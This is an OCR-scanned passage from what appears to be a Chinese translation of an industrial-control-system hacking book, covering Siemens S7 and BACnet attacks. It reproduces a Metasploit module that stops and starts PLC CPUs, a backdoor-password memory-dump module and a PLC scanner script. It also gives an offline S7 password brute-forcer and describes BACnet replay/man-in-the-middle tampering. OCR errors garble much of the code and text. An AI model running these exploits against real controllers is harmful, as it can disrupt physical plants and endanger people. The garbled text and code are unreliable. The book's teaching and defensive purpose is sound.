"\x00\x04\x01\x12\x0a\x10\x02\x00"+ 
"\x40\x00\x01\x84\x00\x00\x00", 


"\x03\x00\x00\x1£\x02\x£0\x80\x32"+4+ 
"\x01\x00\x00\x00\x01\x00\x0e\x00"+ 
"\x00\x04\x01\x12\x0a\x10\x02\x00"+ 
"\x10\x00\x00\x83\x00\x00\x00", 


"\x03\x00\x00\x25\x02\xf0\x80\x32"+ 
"\x01\x00\x00\x00\x02\x00\x14\x00"+ 
"\x00\x28\x00\x00\x00\x00\x00\x00"+ 
"\xfd\x00\x00\x09\x50\x5£\x50\x52"4+ 
"\x4£\x47\x52\x41\x4d" 


| 


# CPU STOP 
1f (cpu == 1) 
connect () 
stop cpu pkt.each do |i| 
sock. put ("#{i}") 
sleep (0.005) 
end 
end 
# CPU START 
if(cpu == 2) 
connect () 
start cpu pkt.each do |i| 
sock. put ("#{i}") 
sleep (0.005) 
end 
end 
# STOP / START CPU 
for n in 0O..cycles 
= 3) 
connect () 


if (cpu 


# We assume PLC is up and running (issue a stop command) 


stop cpu pkt.each do |i| 
sock. put ("#{i}") 
sleep(0.005) 

end 


connect () 
# We assume PLC is has been stopped (issue a start command) 
start cpu pkt.each do |i| 
sock. put ("#{i}") 
sleep(0.005) 
end 
end 
end 


data = sock.get once () 
print good("#{ip} PLC is running, iso-tsap port is open.") 
if (cpu == ‘'true') 
print status ("Putting the PLC into START mode.") 
elsif (cpu == 'false') 
print status ("Putting the PLC into STOP mode.") 
end 
disconnect () 
rescue ::EOFError 
end 
end 
end 


Siemens Simatic S7-300PLC 远 程 内 存 查看 器 


Exploit Title: Siemens Simatic S7 300 Remote Memory Viewer Backdoor 
Date: 7-13-2012 

Exploit Author: Dillon Beresford 

Vendor Homepage: http://www.siemens.com/ 

Tested on: Siemens Simatic S7-1200 PLC 

CVE : None 


+ HH HH +H 


require 'msf/core' 
class Metasploit3 < Msf::Auxiliary 


include Msf::Exploit::Remote::HttpClient 
include Msf: :Auxiliary::Scanner 


def initialize(info = {}) 
super (update info(info, 
'Name'! => 'Siemens Simatic S7-300 PLC Remote Memory Viewer', 
'Description' => %q{ This module attempts to authenticate 


using a hard-coded backdoor password in 

the Simatic S7-300 PLC and dumps 

the device memory using system commands. 
Mode: Values 8, 16 or 32 bit access 
Valid address areas are: 
80000000 - 81FFFFFF SD-Ram cached 


A0000000 - AILFFFFFF SD-Ram uncached 
A8000000 - A87FFFFF Norflash 


AFCO0000 - AFC7FFFF ED-Ram int. uncached 
BFE00000 - BFEFFFFD COM-ED-Ram ext. 
C0000000 - COO7FFFF ED-Ram int. cached 
D0000000 - DOOOSFFF Scratchpad data int. 
D4000000 - D4005FFF Scratchpad code int. 
FO100000 - FOI8FFFF SPS-Asic 16-Bit ac- 
cess only 
Fi 
'Author' => 'Dillon Beresford', 
'License' => MSF LICENSE, 
'References' => 
[ 
L URL”, 
'http://www.us-cert.gov/control systems/pdf/ICS-ALERT-11-204-01%20S7-300 S7-400.pdf' ], 
| 'URL', 
‘http: //www.us-cert.gov/control systems/pdf/ICS-ALERT-11-186-01.pdf' ], 
l 'URL', 
‘http: //www.us-cert.gov/control systems/pdf/ICS-ALERT-11-161-01.pdf' ], 
l4 
'Version' => 'SRevisions', 
'DisclosureDate' => 'June 2011' 
) ) 
register options 人 
[ 
Opt: :RPORT (8080), 
OptString.new('USER', [ true, 


'Simatic S7-300 hardcoded username.', 'basisk']), 
OptString.new('PASS', [ true, 

'Simatic S7-300 hardcoded password.', 'basisk']), 
OptString.new('MODE', [ true, 

'Memory Read Mode (8-bit, 16-bit, 32-bit)', '32']), 
OptString.new('HEX', [ true, 

'Simatic S7-300 memory offset', '1']), 


OptString.new('OFFSET', [ true, 
'Simatic S7-300 memory offset']), 
OptString.new('LENGTH', [ true, 
'Memory Dump Length in Bits', '256']) 
], self.class) 
end 


def run_host (ip) 
begin 


user = datastore['USER' ] 
pass datastore['PASS'] 


print status("Attempting to connect to #{rhost}:#{rport}") 
len = '1024' 
login = send request raw( 

'method' => 'GET', 

'uri' => "/login?User="+user+"&Password="+pass 


request = send request raw( 
'method' => 'GET', 
luri? => 
"/tools/MemoryDump?Address= 
"+datastore['OFFSET']+"&"+"Hex= 


"+datastore['HEX']+"&"+"Length= 
"+datastore['LENGTH' ]+"&Mode= 
+ datastore['MODE'] 

}) 

if (request and request.code == 200) 


print good("Success! Dumping Memory on #{rhost} 
\r\n\n#{ request. body}") 
elsif (request and request.code) 
print error("Attempt #HTTP error #{request.code} 
on #{rhost}") 


end 
end 
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, 
: :Rex: :ConnectionTimeout 
rescue ::Timeout::Error, ::Errno::EPIPE 
rescue ::LocalJumpError 
end 
end 
end 
\ 


5.4.2 ”S57 协议 鉴别 攻击 


MITA: 


一 个 名 为 SCADA Strangelove 的 小 组 (由 工控 系统 工程 师 组 成 ) 发 布 了 一 款 工 具 plscan.py (https://code.google.com/p/plicscan/) ， 该 工具 既 可 以 用 来 
扫描 基于 Modbus 协 议 的 设备 也 可 以 用 来 扫描 基于 Siemens S7 通 信 协 议 的 设备 。 和 Dillon 的 研究 成 果 类 似 ， 小 组 成 员 发 现 了 从 Siemens S7 设 备 中 提取 信息 并 进行 
响应 分 析 的 办 法 ( 见 图 5-12) 。 


$ python plcscan.py 10.1.1.130 

[Scan start... 

10.1.1.130:102 S7comm (src_tsap=0x100, dst_tsap=0x102) 
Module : v.0.0 (89000000000800000000000000000000880080000000000000000 ) 
Name of the PLC : Technodrome (546563686e6f64726f6d65000000000000000000000000000000080000000000 ) 
Name of the module : Siemens, SIMATIC, S7-200 (5369656d656e732c2053494d415449432c2053372d3230300000000000000000) 


Plant identification : Mouser Factory (4d6f7573657220466163746f7279000000000000000000000000000000000000 ) 
Copyright : Original Siemens Equipment (4f726967696e616c205369656d656e732045717569706d656e74080000000000 ) 
Serial number of module : 88111222 (38383131313232320000000000000000000000000000000000000000000000080 ) 
Module type name : IM151-8 PN/DP CPU (494d3135312d3820504e2 f4450204350550000000000000000000000000000080 ) 
OEM ID of a module = (00000000000000000000000000000000000000000000000000000090009090090909090) 
Location designation of a module: (0000000000000000000000000000000000000000000000000000000090090900909090) 


图 5-12 ”plscan.py 脚 本 输出 示例 


基于 上 述 工作 ， 作 为 Redpoint 项 目的 一 部 分 ，Digital Bond 公 司 发 布 了 一 款 脚 本 用 到 了 与 plcscan 脚 本 相同 的 方法 ， 并 将 其 集成 在 Nmap NSE 脚 本 引擎 
(https://nmap.org/nsedoc/scripts/s7-info.html) 。 利 用 该 脚本 收集 到 的 信息 包括 版 本 号 、PLC 名 、 模 块 型 号 、 工 厂 标识 信息 和 序列 号 ( 见 图 5-13) 。 为 了 避 
免 对 现实 世界 中 的 PLC 产 生 影 响 ， 可 以 使 用 集成 在 Conpot 窄 色 (https://github.com/mushorg/conpot) 中 的 Siemens S7 模 拟 器 对 这 些 脚本 进行 测试 。 


Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-10 12:19 EST 
Nmap scan report for 10.1.1.130 

Host is up (0.0047s latency). 

PORT STATE SERVICE 

102/tcp open iso-tsap 

| s7-info: 

| Version: 9.0 

| System Name: Technodrome 

| Module Type: Siemens, SIMATIC, 57-200 
| Serial Number: 88111222 

| Plant Identification: Mouser Factory 
| Copyright: Original Siemens Equipment 
Service Info: Device: specialized 


图 5-13 Nmap NSE S7-info 脚 本 扫描 示例 


File: plcscan.py 
Desc: PLC scanner 


Version: 


ek 


Copyright (c) 2012 Dmitry Efanov (Positive Research) 


—_ author _ = ‘'defanov' 
import modbus 
import s7 


import sys 

from optparse import OptionParser 
import socket 

import struct 


def status (msg): 


def get _ 


sys.stderr.write(msg[:-1] [:39].ljust(39,' ')+msg[-1:]) 
ip list (mask): 
CEV: 
net addr,mask = mask. split ('/') 
mask = int (mask) 
start, = struct.unpack('!L', socket.inet aton(net addr) ) 
Start &= OxFFFFFFFF << (32-mask) 
end = start | ( OxFFFFFFFF >> mask ) 
return [socket.inet ntoa(struct.pack('!L', addr)) for addr in 


ange(start+1, end) ] 
except (struct.error,socket.error) : 


return [|] 


def scan(argv) : 
parser = OptionParser ( 
usage = "usage: %*prog [options] [ip range]...", 
description = """Scan IP range for PLC devices. 
Support MODBUS and S7COMM protocols 
non 
) 
parser.add option("--hosts-list", 
dest="hosts file", help="Scan hosts from FILE", 
metavar="FILE") 
parser.add option("--ports", dest="ports", 
help="Scan ports from PORTS", 
metavar="PORTS", default="102,502") 
parser.add option("--timeout", dest="connect timeout", 
help="Connection timeout (seconds)", 
metavar="TIMEOUT", type="float", default=1) 


modbus .AddOptions (parser) 
s7.AddOptions (parser) 


(options, args) = parser.parse args (argv) 
scan_hosts = [] 
if options.hosts file: 
try: 
scan hosts = [file.strip() for file in open(options.hosts file, 'r')] 


except IOError: 
print "Can't open file %s" % options.hosts file 


ror ip in args: 
scan hosts.extend(get ip list(ip) if '/' in ip else 
[ip] ) 


scan ports = [int (port) for port in options.ports.split(',')] 


if not scan hosts: 
print "No targets to scan\n\n" 
parser.print help() 
exit () 


status ("Scan start...\n") 
for host in scan_hosts: 
splitted = host.split(':') 
host = splitted[0] 
if len(splitted) ==2: 
ports = [int (splitted[1])] 
else: 
ports = scan ports 
for port in ports: 
status("%s:%d...\r" % (host, port) ) 
try: 
sock = socket.socket (socket .AF INET, socket.SOCK STREAM) 
sock.settimeout (options.connect timeout) 
sock.connect ((host,port) ) 
sock.close () 
except socket.error: 
continue 


1f port ss 102: 


res = s7.Scan(host, port, options) 
elif port == 502: 

res = modbus.Scan(host, port, options) 
else: 

res = modbus.Scan(host, port, options) 


or s7.Scan(host, port, options) 


if not res: 
print "%$s:%d unknown protocol" % (host, port) 


status ("Scan complete)\n") 


scan (sys.argv[1:]) 
except KeyboardInterrupt: 
status ("Scan terminated\n") 


上 述 脚本 上 发 布 乙 后 不 久 ，Shodan 搜 索引 擎 把 面向 互联 网 的 Siemens S7 设 备 也 列 入 检索 目标 之 中 (https://www.shodan.io/search? 
query=port%3A102) 。 通 过 查看 这 些 面向 互联 网 的 设备 ， 可 以 友 现 在 这 两 个 脚本 分 析出 来 的 结果 中 ， 有 一 些 字段 值 非常 有 意思 ， 尤 其 是 工厂 标识 信息 字段 。 在 
利用 Shodan 搜 索引 掌 的 一 次 搜索 过 程 中 ， 友 现 了 一 台 S7318 设 备 ， 该 设备 的 工厂 标识 信息 字段 为 “AgricolPolicka”，PLC 名 称 为 “Strojovna”。PLC 名 称 翻译 
过 来 的 意思 就 是 “引擎 室 ”， 而 工厂 标识 信息 字段 则 可 以 帮助 定位 PLC 所 在 的 位 置 一 居然 是 用 在 牛奶 和 鸡蛋 加 工 处 理 厂 当 中 的 。 


Reserved for operating system: 
Serial number of memory card: MMC 
Module type: CPU 318-2 

PLC name: Strojovna 

Module: 6ES7 315-2AG10-@AB@ v.@.1 


Plant identification: Agricol Policka 
Module name: CPU 315-2 DP 

Serial number of module: 23589 

Basic Firmware: VIPA 314-2BG03 V354 v.2.6.0 
Basic Hardware: 6ES7 315-2AG10-0AB@ v.0.1 


54.3 ”S57 协议 口令 暴力 破解 攻击 


Vie ITEE: 


为 了 解决 重 放 攻 击 问题 ，Siemens 创 建 了 需要 使 用 口令 才能 与 设备 进行 通信 的 授权 指令 。 但 是 ，SCADA strangelove 小 组 在 对 Siemens S7 设 备 所 开展 的 测试 
工作 中 ， 还 发 布 了 一 款 工具 ， 该 工具 能 够 采用 多 种 方法 提取 口令 并 对 口令 进行 破解 。 例 如 ， 通 过 访问 项 目 文件 可 以 直接 从 文件 中 提取 出 口令 。 此 外 ， 如 果 攻 击 者 
能 够 访问 网 络 并 且 能 够 通过 嗅 探 的 方式 来 捕获 数据 包 ， 那 么 对 于 所 捕获 到 的 数据 包 就 可 以 利用 挑战 -应 答 信息 从 中 离线 提取 出 散 列 值 ， 然 后 可 以 采用 大 多 数 渗 透 测 
试 框架 都 会 内 置 的 默认 字典 尝试 进行 口令 破解 。 设 备 在 初始 设置 时 都 会 使 用 基本 口令 ， 在 该 口令 传输 过 程 中 进行 嗅 探 就 可 以 捕获 相关 数据 包 。 针 对 所 捕获 到 的 样 
本 数据 包 ， 使 用 s7 1200 brute offline.py 脚 本 (https://github.com/atimorin/PoC2013/blob/master/S7/s7-1200 brute offline.py， 代 码 如 下 所 示 ) 进行 口 
令 破解 ， 简 单 的 口令 设置 只 需要 几 秒 钟 就 可 以 破解 完成 (如 图 5-14 所 示 ) 。 对 于 971500 设 备 ， 上 述 方法 同样 适用 ， 相 关 脚 本 与 S71200 脚 本 同时 发 布 。 


using pcap file: auth.pcap , wordlist file: /usr/share/wordlists/nmap.lst 
found packet indeces: pckt 108=64, pckt 141=66, pckt 84=68, pckt 92=0 
auth ok 

found challenge: 5ef143ad59263683aca4b fe53/7b4/283/743ae/12 

found response: 2aQdb4de2ce5fe/9c949e4a3b9a8/el 4636c80e8 

Start password bruteforsing 

found password: 123 


图 5-14 ”s7-1200_brute_offline.py 脚 本 示例 


!/usr/bin/env python 


File: s7 brute offline.py 
Desc: Offline password bruteforse based on challenge-response data, 
extracted from auth traffic dump file. 


— author. = "Aleksandr Timorin" 

— copyright = "Copyright 2013, Positive Technologies" 
__license = "GNU GPL v3" 

__version_ = "1.1" 

_ maintainer. = "Aleksandr Timorin" 

= email = "atimorin@gmail.com" 

_ status = "Development" 


import sys 
import hashlib 
import hmac 
import optparse 
from binascii import hexlify 
try: 
from scapy.all import * 
except ImportError: 
print "please install scapy: http://www.secdev.org/projects/scapy/ " 


sys.exit () 


def get challenge response (pcap file): 
r = rdpcap(pcap file) 


lens = map(lambda x: x.len, r) 
pckt lens = dict([(i, lens[i]) for i in range(0,len(lens) )] ) 


# try to find challenge packet 
pckt 108 = 0 #challenge packet (from server) 
for (pckt indx, pckt len) in pckt lens.items() : 


if pckt len+14 == 108 and hexlify(r[pckt_ indx].load) [14:24] == 
P2022 732%; 
pekt 108 = pekt indx 
break 


# try to find response packet 
pckt 141 = 0 #response packet (from client) 
tl1 = dict([ (i, lens[i]) for i in pckt lens.keys() [pckt 108:] ]) 
for pckt indx in sorted( tl1.keys()): 
pekt len = til[pckt_indx] 


if pckt len+14 == 141 and hexlify(r[pckt indx].load) [14:24] == 
'7202004831': 
pekt 141 = pckt_indx 
break 


# try to find auth result packet 
pckt 84 = 0 # auth answer from plc: pckt len==84 -> auth ok 
pckt 92 = 0 # auth answer from plc: pckt len==92 -> auth bad 
for pekt_indx in sorted( tl1.keys()): 

pekt len = tl1[pckt indx] 


if pckt len+14 == 84 and hexlify(r[pckt_ indx] .load) [14:24] == '7202000f32': 
pekt 84 = pckt indx 
break 

if pckt len+14 == 92 and hexlify(r[pckt_ indx] .load) [14:24] == '7202001732': 
pekt 92 = pekt indx 
break 


print "found packet indeces: pckt 108=%d, pckt 141=%d, pckt 84=%d, 
PCckt 92=%d" % (pckt 108, pckt 141, pckt 84, pckt 92) 
if pckt 84: 
print "auth ok" 
else: 
print "auth bad. for brute we need right auth result. exit" 
sys.exit () 


challenge = None 
response = None 


raw challenge = hexlify(r[pckt_108] .load) 
if raw_challenge[46:52] == '100214' and raw challenge[92:94] == '00': 
challenge = raw _challenge[52:92] 
print "found challenge: %s" % challenge 
else: 
print "cannot find challenge. exit" 
sys.exit () 


raw response = hexlify(r[pckt_ 141] .load) 
if raw_response [64:70] == '100214' and raw_response[110:112] = 
response = raw response [70:110] 


print "found response: %s" % response 
else: 


'OO': 


print "cannot find response. exit" 


sys.exit ( ) 
return challenge, response 


def calculate s7response (password, challenge): 


challenge = challenge.decode ("hex") 

return hmac.new( hashlib.shal(password).digest(), challenge, hashlib.shal) 
.hexdigest () 
1f name == ' main _': 

parser = optparse.OptionParser () 

parser.add option('-p', '--pcap', dest="pcap file", help="traffic dump file") 

parser.add option('-w', '--wordlist', dest="wordlist file", help="wordlist 
file") 

options, args = parser.parse args () 


pcap file = options.pcap file 
wordlist file = options.wordlist file 
if not pcap file or not wordlist file: 
parser.print help () 
sys.exit () 


© 


print "using pcap file: %s , wordlist file: %s" % (pcap file, wordlist file) 
challenge, response = get challenge response(pcap file) 
print "Start password bruteforsing..." 
for p in open(wordlist file): 
Dp = p.stript) 
if response == calculate s7response(p, challenge) : 


© 


print "found password: %s" % p 
sys.exit () 
print "password not found. try another wordlist." 


[1] Dillon Beresford 现任 惠普 公司 软件 安全 工程 师 。 一 译 者 注 


5.5 BACnet 协 议 


以 前 ， 楼 宇 自动 化 系统 (building automation system) 一 直 处 于 严格 的 监控 之 下 ， 因 为 自动 化 系统 被 划分 在 控制 系统 网 络 的 范畴 之 中 。 在 过 去 的 几 年 中 ， 
我 们 发 现 有 些 大 型 公司 的 楼 宇 自动 化 系统 暴露 在 了 互联 网 之 上 (http://www.wired.com/2013/05/googles-control-system-hacked/) 。 一 个 至 少 在 2014 年 非 
常 突出 的 案例 之 中 ， 一 家 美国 大 型 商业 公司 的 空调 系统 (HVAC) 被 攻击 者 选择 作为 入 侵 公 司 的 主 入 口 点 。 楼 宇 自动 化 协议 中 最 著名 的 协议 之 一 是 楼 字 自 动 控制 
网 络 数 据 通信 协议 (Building Automation and Control Networks, BACnet) 。 和 前 文 讨论 的 其 他 协议 类 似 ，BACnet 协 议 也 缺少 很 多 基本 的 安全 防护 措施 ， 
因此 容易 遭受 信息 收集 与 系统 攻击 等 问题 。BACnet 协 议 是 美国 采暖 、 制 冷 与 空调 工程 师 协会 (American Society of Heating, Refrigerating and Air- 
Conditioning Engineers, ASHRAE) 制订 的 标准 ， 其 标准 号 为 135.1， 并 由 该 协会 提供 维护 。BACnet 协 议 对 建筑 设备 之 间 互 相通 信 的 服务 做 出 了 定义 。 但 
是 ，BACnet 协 议 的 实际 应 用 并 不 限于 空调 系统 。 当 前 ， 公 司 企业 在 应 用 楼 宇 自动 化 协议 控制 发 电机 组 、 升 降 机 、 采 光 控 制 系 统 、 消 防 炎 火 系 统 、 和 警报 系统 和 访问 
控制 系统 等 方面 都 有 许多 应 用 实例 。 


与 很 多 其 他 的 自动 化 系统 协议 不 同 ， 采 购 基于 BACnet 协 议 的 设备 相对 来 说 比较 便宜 一 些 。 甚 至 还 有 附带 了 演示 程序 的 开源 全 功能 BACnet 协 议 栈 。 在 
SourceForge 网 站 上 也 提供 了 简单 易 用 的 BACnet 栈 模拟 器 可 以 用 于 测试 (http://bacnet.sourceforge.net/) 。 下 载 BACnet 栈 并 解压 后 ， 可 以 通过 执行 make 


clean all 命 令 编译 代码 。 


make clean all ] 
make -s -C lib clean 
make -s -C demo clean 
make -s -C demo/router clean 
make -s -C lib all 


编译 过 程 如 果 没有 出 现 错误 ， 则 表示 编译 成 功 ， 演 示 程 序 可 以 运行 。 对 于 测试 最 有 帮助 的 演示 程序 位 于 路 径 demo/server/bacserv 之 下 。Bacserv 是 一 个 演示 


服务 器 程序 ， 在 运行 过 程 中 能 够 监听 BACnet 请 求 ， 并 以 适当 信息 对 发 送 过 来 的 所 有 查询 请 求 进行 响应 。 


在 发 送 请 求 之 前 ， 需 要 了 解 基本 的 BACnet 协 议 数据 包 结构 。 本 节 中 提 到 的 BACnet 数 据 包 ， 主 要 用 于 以 太 网 并 且 采 用 UDP 方式 进行 通信 。 但 是 ，BACnet 协 
议 也 可 以 通过 其 他 介质 进行 通信 ， 比 如 ARCNET、MSVTP 和 LonTalk 等 类 型 的 网 络 。BACnet 协 议 帧 主要 由 两 个 部 分 组 成 ， 这 些 帧 中 还 包括 很 多 分 段 ， 称 之 为 网 络 
协议 数据 单元 (Network Protocol Data Unit, NDPU) 和 应 用 协议 数据 单元 (Application Protocol Data Unit, APDU) 。NPDU 由 BACnet 协 议 帧 的 网 络 部 
分 构成 ，ADPU 则 包含 了 针对 应 用 的 诸多 信息 。 


在 应 用 协议 数据 单元 里 ， 信 息 包 括 了 APDU 类 型 、 服 务 种 类 (service choice) 、 对 象 标识 符 (object identifier) 和 属性 标识 符 (property identifier) ， 如 
图 5-15 所 示 。 对 象 标识 符 是 用 于 与 BACnet 设 备 通 信 的 ID 号 ， 是 一 个 独一无二 的 数值 。 对 于 类 似 于 属性 读 取 (readProperty) 之 类 的 基本 请 求 ， 不 需要 对 象 标识 
符 就 能 得 到 响应 。 但 是 ， 要 想 获 取 更 多 信息 则 需要 用 到 对 象 标 识 符 ， 如 查询 设 定点 和 数值 名 。 


Source Destination Protocol Lengtr Info 
10.1.1.167 10.1.1.165 46 Source port: 64087 Destination port: 47808[Malformed.. 
10.1.1.167 10.1.1.165 46 Source port: 64088 Destination port: 47808 [Malformed.. 
10.1.1.167 10.1.1.165 BACnet-APDU 63 Confirmed-REQ readProperty[ 1] device,41943@3 obje.. 
» 10.1.1.165 10.1.1.167 BACnet-APDU 69 Complex-ACK readProperty[ 1] device,4194303 obje.. 
Frame 3: 63 bytes on wire (504 bits), 59 bytes captured (472 bits) 
Ethernet II, Src: IntelCor_21:22:f8 (3c:a9:f4:21:22:f8), Dst: Cisco_24:3c:ca (00:19:07:24:3c:ca) 
Internet Protocol Version 4, Src: 10.1.1.167 (10.1.1.167), Dst: 10.1.1.165 (10.1.1.165) 
User Datagram Protocol, Src Port: 47808 (47808), Dst Port: 47808 (47808) 
BACnet Virtual Link Control 
Building Automation and Control Network NPDU 
Version: 0x01 (ASHRAE 135-1995) 
> Control: 0x04, Expecting Reply 
Building Automation and Control Network APDU 
0000 .... = APDU Type: Confirmed-REQ (0) 
PDU Flags: 0x00 
Max Response Segments accepted: Unspecified (0) 
Size of Maximum ADPU accepted: Up to 1476 octets (fits in an ISO 8802-3 frame) (5) 
Invoke ID: 1 
Service Choice: readProperty (12) 
> ObjectIdentifier: device, 4194303 
> Property Identifier: object-identifier (75) 


0000 00 19 07 24 3c ca 3c a9 f4 21 22 f8 08 BB 45 00 
0010 00 2d 28 af 00 00 80 11 fa c3 ða 01 01 a7 Ba 01 
0020 01 a5 ba co ba co 00 19 59 al 81 ða OO 11 01 04 
0030 00 05 01 Oc Oc 02 3f ff ff 19 4b 


图 5-15 ”readProperty 读 取 属 性 数据 包 捕 获 示 例 


BACnet 探 测 工具 (BACnet Discovery Tool, BDT) 是 一 款 免费 工具 (http://www.ccontrols.com/sd/bdt.htm) ， 可 以 用 于 对 BACnet 设 备 进行 查询 及 信 
息 采 集 。 使 用 该 工具 时 ， 需 要 首先 将 其 下 载 到 Windows 机 器 上 然后 打开 运行 。 工 具 局 动 后 ， 在 BBMD 地 址 栏 处 输入 BACnet 设 备 的 IP 地 址 ， 然 后 再 单 击 Set BBMD 
按钮 即 可 以 开始 设备 信息 的 查询 。 


m A tC Le a p 
IAN i= 4 J 29 


这 时 会 发 送 初 始 查 询 请 求 到 远程 设备 并 设置 对 象 标 识 符 ， 从 而 对 设备 进行 查询 以 获取 更 多 信息 。 某 些 情况 下 ， 查 询 并 不 会 成 功 ， 这 是 因为 设备 本 身 不 允许 将 
远程 设备 加 入 到 外 部 设备 表 (Foreign Device Table, FDT) 中 ， 以 防止 从 设备 中 提取 额外 信息 ， 部 分 简单 的 信息 则 无 需 加 入 FDT 就 能 查询 得 到 。 外 部 设备 表 存 储 
在 本 地 设备 中 ， 用 于 允许 远程 设备 加 入 到 BACnet 通 信 过 程 ， 从 而 接收 信息 并 向 设备 友 送 命令 。 外 部 设备 表 中 的 每 个 设备 都 有 一 个 生存 时 间 (Time to 
Live, TTL) 。 这 一 数值 限制 了 重新 加 入 外 部 设备 表 之 前 的 存活 时 间 。 如 果 在 左边 的 框 中 看 到 某 个 设备 ， 如 图 5-16 所 示 ， 则 意味 着 该 设备 加 入 成 功 ， 这 时 就 可 以 从 
设备 中 查询 信息 了 。 


Device 1337: Thaw1002 at 10. 1. 3. 4:bac0 


Device 1337: Thaw100?2 at 10.1.3.4:bac0 


Device-133/ 
Analog Input-0 
Analog Input-1 
Analog Input-2 
Analog Input-3 
Analog Output-0 
Analog Output-1 
Analog Output-2 
Analog Output-3 
Analog Value-0 
Analog Value-1 
Analog Value-2 
Analog Value-3 
Binary Input-0 
Binary Input-1 
Binary Input-2 
Binary Input-3 
Binary Input-4+ 
Binary Output-0 
Binary Output-1 
Binary Output-2 
Binary Output-3 


图 5-16 ”BACnet 设 备 的 输入 与 输出 


设备 本 身 的 信息 可 以 通过 单 击 设备 的 <Device Objectidentifier> 按 钮 查询 得 到 ， 此 时 会 友 送 多 个 设备 属性 读 取 命令 (Read Device Property) 以 提取 出 设备 
的 特定 信息 ， 这 些 信息 将 会 在 随后 弹出 的 窗口 中 显示 。 在 图 5-17 所 示 的 界面 中 ， 包 含 了 设备 的 一 些 相 关 细 节 信 息 ， 比 如 对 象 标 识 符 、 对 象 名 、 状 态 、 厂 商 名 、 型 
号 、 固 件 版 本 号 、 应 用 软件 版 本 号 、 支 持 的 协议 服务 、 支 持 的 协议 对 象 类 型 、 本 地 时 | 间 和 本 地 日 期 等 信息 。 


Object Name __ Cancel | 
| Thaw 1002 


status 


| Operational 
Vendor Name 
| HackingExposed 
Model Name 
Linkavitch Chomofsky 
Firmware Revision 
0.8.2 
Application Software Version 


[1.0 


Protocol Services Supported 
ACKNOWLEDGE ALARM à 
ATOMIC READ FILE 
ATOMIC WRITE FILE 

DEVICE COMMUNICATION CONTROL 

GFT Al ARM Sl IMMARY 


RINABY Ol TPIT 
Local Time 


| lt347.1 


Local Date 


Saturday 1 21 2016 


图 5-17 BDT 工 具 对 BACnet 设 备查 询 得 到 的 详细 信息 


如 图 所 示 ， 设备 1337 定 义 了 61 个 对 象 ， 包括 模拟 输入 、 模 拟 输 出 、 模 拟 值 、 二 进 制 输入 和 二 进 制 输出 。 其 中 模拟 输入 和 输出 的 数值 非常 有 趣 ， 值 得 进一步 分 
析 。 它 们 可 以 帮助 我 们 确定 系统 最 终 的 用 途 。 对 于 大 部 分 工控 系统 来 说 ， 工 程 师 们 在 命名 设 定点 时 常常 采用 描述 性 的 文字 。 这 些 设 定 点 的 名 字 本 身 融 对 各 自 的 功 
能 进行 了 说 明 ， 例 如 某 个 房间 的 温度 传感器 ， 或 者 是 办 公 楼 中 某 一 层 的 风机 用 在 哪个 楼 层 和 哪些 部 门 。 在 2014 年 的 一 次 演示 中 
(https://www.youtube.com/watch?v=7jfshUL-OyM) , Digital Bond 公 司 的 Stephen Hilt 研 究 员 甚至 展示 了 在 互联 网 上 发 现 的 某 监狱 系统 的 水 塔 信息 (如 图 
5-18 所 示 ) 。 


Device 502: Prison at —_—= = baco 


Vendor Proprietary Value-2 
Vendor Proprietary Value-2 
Vendor Proprietary Value-2 
Vendor Proprietary Value-2 
Vendor Proprietary Value-2 
Vendor Proprietary Value-2 
Vendor Proprietary Value-2 
Access Point-1769099 264 
Vendor Proprietary Value-1769099264 
Binary Output-O 

Binary OCutput-O 
Device-SO2 

Analog Input-30000 16 
Analog Input-30000 17 


Object Properties 


Obj Name 
Prison/mN2 Trunk 2.Prison.DAY-LVL 


Present Value 


| 8.781528 


In_Alarm Fault Overridden Out_of_Service 
= = = E i 


Write Value | 
Priority | 1 v | 
vrite | 


图 5-18 BACnet 对 象 命名 示例 


正如 许多 其 他 协议 一 样 ， 也 有 很 多 工具 通过 BACnet 协 议 进 行 通信 与 信息 查询 。Redpoint 项 目 发 布 的 第 一 个 脚本 
(https://nmap.org/nsedoc/scripts/bacnet-info.html) 融 是 针对 BACnet 协 议 的 脚本 ， 该 脚本 主要 用 于 提取 显示 在 BDT 工 具 中 设备 对 象 属性 窗口 中 的 信息 。 


BACnet 协 议 中 间 人 攻击 


流行 度 : 


BACnet 是 没有 身份 认证 机 制 的 协议 ， 也 不 存在 需要 协商 的 会 话 标识 符 。 这 样 造成 的 结果 就 是 ， 如 果 利 用 捕获 到 的 UDP 数 据 包 实施 重 放 攻 击 ， 那 么 将 会 被 当 作 
初始 请 求 ， 然 后 以 与 处 理 初始 请 求 相同 的 方式 进行 处 理 。 举 个 例子 ， 如 果 友 现在 人 机 界面 修改 BACnet 远 程 设备 的 某 个 数值 ， 比 如 改变 房间 的 温度 ， 那 么 就 可 针对 
这 一 过 程 发 起 重 放 攻击 ， 并 且 可 以 不 断 用 新 设置 的 数值 替换 原来 的 数值 。 只 需 对 数据 包 进 行 很 小 的 改动 ， 温 度 值 束 可 以 被 修改 成 其 他 数值 。 倘 若 这 个 问题 故 生 在 
服务 器 机 房 内 ， 而 温度 改变 之 后 又 没有 玉 取 纠正 措施 解决 这 个 问题 ， 那 么 机 房 内 的 系统 就 可 能 遭受 损坏 。 为 了 防止 系统 采取 纠正 措施 ， 中 间 人 攻击 还 可 以 拦截 从 
远程 BACnet 设 备 友 回 的 网 络 流量 ， 使 温度 数值 看 起 来 像 未 被 修改 前 一 样 。 


5.6 ”其 他 协议 


工控 系统 和 SCADA 系 统 环境 通常 包括 很 多 不 同 的 协议 ， 由 于 这 些 协议 都 是 厂商 的 专 有 协议 ， 所 以 这 些 协议 可 能 既 没 有 公开 定义 ， 也 没有 被 广泛 采用 。 很 多 厂 
商都 会 实现 自己 的 专 有 协议 以 对 特定 应 用 程序 进行 操作 ， 例 如 远程 对 PLC 进 行 编程 。 广 商 们 这 样 做 的 原因 在 于 ， 可 以 在 无 需 对 协议 进行 改动 的 情况 下 实现 Modbus 
协议 和 其 他 协议 ， 进 而 实现 诸如 远程 装载 逻辑 乙 类 的 编程 开 友 功能 。 在 厂商 设计 开发 的 专 有 协议 中 ， 研 究 人 员 对 Phoenix Contact 和 Omron 两 家 制造 商 采 用 的 协 
议 开 展 了 大 量 的 研究 工作 。 这 两 家 制造 商 均 实现 了 自己 的 专 有 协议 ， 即 PCWORX 协 议和 OMRON FINS 协 议 ， 并 将 其 用 于 工程 软件 。 与 Schneider 公司 的 Unity 
